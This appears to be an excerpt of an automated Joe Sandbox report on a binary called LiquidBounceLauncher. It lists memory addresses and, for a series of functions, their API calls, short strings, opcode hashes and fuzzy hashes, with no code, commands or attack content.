                                                                                                                                                                                      0x0041f3ba
                                                                                                                                                                                      0x0041f3cf
                                                                                                                                                                                      0x0041f3d1
                                                                                                                                                                                      0x0041f3d4
                                                                                                                                                                                      0x0041f3de
                                                                                                                                                                                      0x0041f3e4
                                                                                                                                                                                      0x0041f618
                                                                                                                                                                                      0x0041f628
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f62a
                                                                                                                                                                                      0x0041f62a
                                                                                                                                                                                      0x0041f638
                                                                                                                                                                                      0x0041f64c
                                                                                                                                                                                      0x0041f652
                                                                                                                                                                                      0x0041f7ca
                                                                                                                                                                                      0x0041f658
                                                                                                                                                                                      0x0041f658
                                                                                                                                                                                      0x0041f65e
                                                                                                                                                                                      0x0041f663
                                                                                                                                                                                      0x0041f669
                                                                                                                                                                                      0x0041f66f
                                                                                                                                                                                      0x0041f66f
                                                                                                                                                                                      0x0041f673
                                                                                                                                                                                      0x0041f679
                                                                                                                                                                                      0x0041f7d9
                                                                                                                                                                                      0x0041f7dd
                                                                                                                                                                                      0x0041f7e8
                                                                                                                                                                                      0x0041f7f0
                                                                                                                                                                                      0x0041f7f0
                                                                                                                                                                                      0x0041f7f3
                                                                                                                                                                                      0x0041f7f9
                                                                                                                                                                                      0x0041f800
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f687
                                                                                                                                                                                      0x0041f68c
                                                                                                                                                                                      0x0041f68f
                                                                                                                                                                                      0x0041f695
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f697
                                                                                                                                                                                      0x0041f6a0
                                                                                                                                                                                      0x0041f6ab
                                                                                                                                                                                      0x0041f6b2
                                                                                                                                                                                      0x0041f6ba
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f6c0
                                                                                                                                                                                      0x0041f6c0
                                                                                                                                                                                      0x0041f6c0
                                                                                                                                                                                      0x0041f6c3
                                                                                                                                                                                      0x0041f6c9
                                                                                                                                                                                      0x0041f6d0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f6d0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f6ba
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f6a0
                                                                                                                                                                                      0x0041f6d2
                                                                                                                                                                                      0x0041f6d2
                                                                                                                                                                                      0x0041f6de
                                                                                                                                                                                      0x0041f6e4
                                                                                                                                                                                      0x0041f7d2
                                                                                                                                                                                      0x0041f7d2
                                                                                                                                                                                      0x0041f6ea
                                                                                                                                                                                      0x0041f6f6
                                                                                                                                                                                      0x0041f6f8
                                                                                                                                                                                      0x0041f6fe
                                                                                                                                                                                      0x0041f701
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f70f
                                                                                                                                                                                      0x0041f70f
                                                                                                                                                                                      0x0041f715
                                                                                                                                                                                      0x0041f718
                                                                                                                                                                                      0x0041f718
                                                                                                                                                                                      0x0041f701
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f6e4
                                                                                                                                                                                      0x0041f68f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f71b
                                                                                                                                                                                      0x0041f71b
                                                                                                                                                                                      0x0041f72f
                                                                                                                                                                                      0x0041f734
                                                                                                                                                                                      0x0041f73a
                                                                                                                                                                                      0x0041f740
                                                                                                                                                                                      0x0041f743
                                                                                                                                                                                      0x0041f74b
                                                                                                                                                                                      0x0041f663
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f652
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f3ea
                                                                                                                                                                                      0x0041f3ea
                                                                                                                                                                                      0x0041f75b
                                                                                                                                                                                      0x0041f767
                                                                                                                                                                                      0x0041f3f9
                                                                                                                                                                                      0x0041f3fd
                                                                                                                                                                                      0x0041f400
                                                                                                                                                                                      0x0041f406
                                                                                                                                                                                      0x0041f773
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f779
                                                                                                                                                                                      0x0041f784
                                                                                                                                                                                      0x0041f791
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f791
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f40c
                                                                                                                                                                                      0x0041f40c
                                                                                                                                                                                      0x0041f40c
                                                                                                                                                                                      0x0041f412
                                                                                                                                                                                      0x0041f415
                                                                                                                                                                                      0x0041f41b
                                                                                                                                                                                      0x0041f422
                                                                                                                                                                                      0x0041f428
                                                                                                                                                                                      0x0041f42e
                                                                                                                                                                                      0x0041f442
                                                                                                                                                                                      0x0041f448
                                                                                                                                                                                      0x0041f430
                                                                                                                                                                                      0x0041f432
                                                                                                                                                                                      0x0041f43c
                                                                                                                                                                                      0x0041f798
                                                                                                                                                                                      0x0041f79e
                                                                                                                                                                                      0x0041f7a5
                                                                                                                                                                                      0x0041f7b0
                                                                                                                                                                                      0x0041f7b2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f43c
                                                                                                                                                                                      0x0041f42e
                                                                                                                                                                                      0x0041f44a
                                                                                                                                                                                      0x0041f44f
                                                                                                                                                                                      0x0041f45e
                                                                                                                                                                                      0x0041f463
                                                                                                                                                                                      0x0041f469
                                                                                                                                                                                      0x0041f46f
                                                                                                                                                                                      0x0041f477
                                                                                                                                                                                      0x0041f479
                                                                                                                                                                                      0x0041f47f
                                                                                                                                                                                      0x0041f47f
                                                                                                                                                                                      0x0041f482
                                                                                                                                                                                      0x0041f482
                                                                                                                                                                                      0x0041f48a
                                                                                                                                                                                      0x0041f61a
                                                                                                                                                                                      0x0041f623
                                                                                                                                                                                      0x0041f498
                                                                                                                                                                                      0x0041f4a3
                                                                                                                                                                                      0x0041f4aa
                                                                                                                                                                                      0x0041f4ae
                                                                                                                                                                                      0x0041f4b4
                                                                                                                                                                                      0x0041f4bb
                                                                                                                                                                                      0x0041f4c4
                                                                                                                                                                                      0x0041f4cd
                                                                                                                                                                                      0x0041f4d4
                                                                                                                                                                                      0x0041f4db
                                                                                                                                                                                      0x0041f4e2
                                                                                                                                                                                      0x0041f4e9
                                                                                                                                                                                      0x0041f4ef
                                                                                                                                                                                      0x0041f4f6
                                                                                                                                                                                      0x0041f4fd
                                                                                                                                                                                      0x0041f504
                                                                                                                                                                                      0x0041f50b
                                                                                                                                                                                      0x0041f512
                                                                                                                                                                                      0x0041f519
                                                                                                                                                                                      0x0041f520
                                                                                                                                                                                      0x0041f52b
                                                                                                                                                                                      0x0041f542
                                                                                                                                                                                      0x0041f545
                                                                                                                                                                                      0x0041f55d
                                                                                                                                                                                      0x0041f564
                                                                                                                                                                                      0x0041f572
                                                                                                                                                                                      0x0041f578
                                                                                                                                                                                      0x0041f57e
                                                                                                                                                                                      0x0041f58a
                                                                                                                                                                                      0x0041f58f
                                                                                                                                                                                      0x0041f59a
                                                                                                                                                                                      0x0041f59d
                                                                                                                                                                                      0x0041f5a5
                                                                                                                                                                                      0x0041f5ad
                                                                                                                                                                                      0x0041f5b1
                                                                                                                                                                                      0x0041f5b5
                                                                                                                                                                                      0x0041f5b8
                                                                                                                                                                                      0x0041f5cc
                                                                                                                                                                                      0x0041f5cc
                                                                                                                                                                                      0x0041f48a
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                      • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                                                                                                                      • API String ID: 39653677-662103887
                                                                                                                                                                                      • Opcode ID: b86d1c35b081655c37a125d9a8304173755394aa68f0ca7d033b476a8ea28b33
                                                                                                                                                                                      • Instruction ID: 9e7023e5fa5e452bdd3b5ebe0cfdf35acb6f10546df9739633dfebc14bb07f83
                                                                                                                                                                                      • Opcode Fuzzy Hash: b86d1c35b081655c37a125d9a8304173755394aa68f0ca7d033b476a8ea28b33
                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE15D719042688FDB20CF69C8903DEFBF1BF49304F4440AAD499AB351D7799A8ACF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0042C2B0 Relevance: 7.9, Strings: 6, Instructions: 401COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: .$@$Inf$NaN$gfff$gfff
                                                                                                                                                                                      • API String ID: 0-3155045678
                                                                                                                                                                                      • Opcode ID: adc2c6d5ceda98725fd7bab20c5468343051e7db9dd8fe0b4c40d0abf8d4e1b7
                                                                                                                                                                                      • Instruction ID: b52e339f0c5a526cf89cd18c29add71624586b613af746f7831a4f4da7603920
                                                                                                                                                                                      • Opcode Fuzzy Hash: adc2c6d5ceda98725fd7bab20c5468343051e7db9dd8fe0b4c40d0abf8d4e1b7
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9E1AF71B083269BD710DE29E48435FB7E2AFC4740F55C92EE8888B354E778ED458B86
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0042A030 Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: localeconv
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3737801528-0
                                                                                                                                                                                      • Opcode ID: 8fa388381c51db0a33f3aa04f0e42bcb1ab5fd0510cab1d7089a372aab35cdfc
                                                                                                                                                                                      • Instruction ID: 2b6e84c75bde145b4de79e45895d21877efc0e9e6fbe6b2e039c440117290432
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fa388381c51db0a33f3aa04f0e42bcb1ab5fd0510cab1d7089a372aab35cdfc
                                                                                                                                                                                      • Instruction Fuzzy Hash: A5428C707083658BC710DF29A09432BB7E2BF84304F99496EEC858B341D779E959CB8B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0046A730 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 851COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -
                                                                                                                                                                                      • API String ID: 0-2547889144
                                                                                                                                                                                      • Opcode ID: 216e922420bf9a82562f20d07810cdb6aaa0c9e791804754bc43f42bc7a38f78
                                                                                                                                                                                      • Instruction ID: cccef0603d86a6ea4749ab219768ef679769a277dc17f2a7828ae068f6503497
                                                                                                                                                                                      • Opcode Fuzzy Hash: 216e922420bf9a82562f20d07810cdb6aaa0c9e791804754bc43f42bc7a38f78
                                                                                                                                                                                      • Instruction Fuzzy Hash: C372A270A006098FCB14CF64C494AAEBBF1BF05314F14855AE865AB391E739ED96CF87
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0044A0F0 Relevance: 3.5, Strings: 2, Instructions: 1017COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -$`tI
                                                                                                                                                                                      • API String ID: 0-3701975591
                                                                                                                                                                                      • Opcode ID: bdc7d74e9e07efe9e1a22e225252523be4871c13bfb71127900badb37e37f30b
                                                                                                                                                                                      • Instruction ID: ebfa12faa0b725af50b0b4a4c25adf46905756106ed3220fac13ace5666f78dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: bdc7d74e9e07efe9e1a22e225252523be4871c13bfb71127900badb37e37f30b
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3928D70A442098FEB14DF68C0847AE7BB1BF05304F25855EE8499F391D779DCA6CB8A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004490C0 Relevance: 3.5, Strings: 2, Instructions: 1016COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -$plI
                                                                                                                                                                                      • API String ID: 0-1117425934
                                                                                                                                                                                      • Opcode ID: df471f9e9f37d3400e8d98e039453f2cd3fcde6c724d3601132792b71eaca83e
                                                                                                                                                                                      • Instruction ID: afb67dcf8cfa6037a41c6d6a31cf77f71b240c9b6449f3d2ec2dd691799320de
                                                                                                                                                                                      • Opcode Fuzzy Hash: df471f9e9f37d3400e8d98e039453f2cd3fcde6c724d3601132792b71eaca83e
                                                                                                                                                                                      • Instruction Fuzzy Hash: AA926D70A042499BEB14DF68C084BAF7BB1BF05314F24855EE8499F391D379DC86EB89
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00421580 Relevance: 3.4, APIs: 2, Instructions: 398stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004246B0: InterlockedIncrement.KERNEL32 ref: 004246DD
                                                                                                                                                                                        • Part of subcall function 004246B0: InterlockedDecrement.KERNEL32 ref: 00424807
                                                                                                                                                                                      • strlen.MSVCRT ref: 00421609
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrementstrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 888450825-0
                                                                                                                                                                                      • Opcode ID: 4404fa005b605f3464ea0119655a60b58495519989f223e8343598f34ca35e0e
                                                                                                                                                                                      • Instruction ID: 845bf0c5147293a52c32276cc5a78f66049ce202c2f1f125776ce4a7dee855bf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4404fa005b605f3464ea0119655a60b58495519989f223e8343598f34ca35e0e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF105B07087655FD714CF28D084366FBE1BBA5304F88836FD4994B362D379A985CB8A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0046C470 Relevance: 2.1, Strings: 1, Instructions: 844COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -
                                                                                                                                                                                      • API String ID: 0-2547889144
                                                                                                                                                                                      • Opcode ID: b460be66431cbfd103863b663d52855b987ae61e7b628990273929e69dd1952f
                                                                                                                                                                                      • Instruction ID: db07951290d8ff778457844dd59b1a20e996a5188f35a41ba2a93aa44d3d7bc8
                                                                                                                                                                                      • Opcode Fuzzy Hash: b460be66431cbfd103863b663d52855b987ae61e7b628990273929e69dd1952f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 58729070A002598FCB14DF68C4C4ABEBBB1BF05304F14855AE8859B391E739ED86CB5B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0046B740 Relevance: 2.1, Strings: 1, Instructions: 842COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -
                                                                                                                                                                                      • API String ID: 0-2547889144
                                                                                                                                                                                      • Opcode ID: 06d87871b354a55506a0e116114215491c1ee2d902501e9ae473e64522335c7e
                                                                                                                                                                                      • Instruction ID: e9ebebe48eb45827b308ed3772828a999b0f710e78318d8904bc3227b4e1aef5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 06d87871b354a55506a0e116114215491c1ee2d902501e9ae473e64522335c7e
                                                                                                                                                                                      • Instruction Fuzzy Hash: FA726C70A04249CBCB14DF68C494AAEBBB1FF05314F14815AE885DB351E739ED86CB9B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004518F0 Relevance: 2.0, APIs: 1, Instructions: 758COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f25c48fa013798475fdf3a39872228c50acb8dfcffc29b2fc9ce7d35117565b8
                                                                                                                                                                                      • Instruction ID: f5d8fa0b69a37b40fad7e33f5ff09e5a5febf2e226d5064e8b6f4417aab41f94
                                                                                                                                                                                      • Opcode Fuzzy Hash: f25c48fa013798475fdf3a39872228c50acb8dfcffc29b2fc9ce7d35117565b8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 41629070904298CFCB15CF68C5907AEBBB1AF06315F14825BEC659B3A3C379AD4ACB45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004502C0 Relevance: 2.0, APIs: 1, Instructions: 712COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
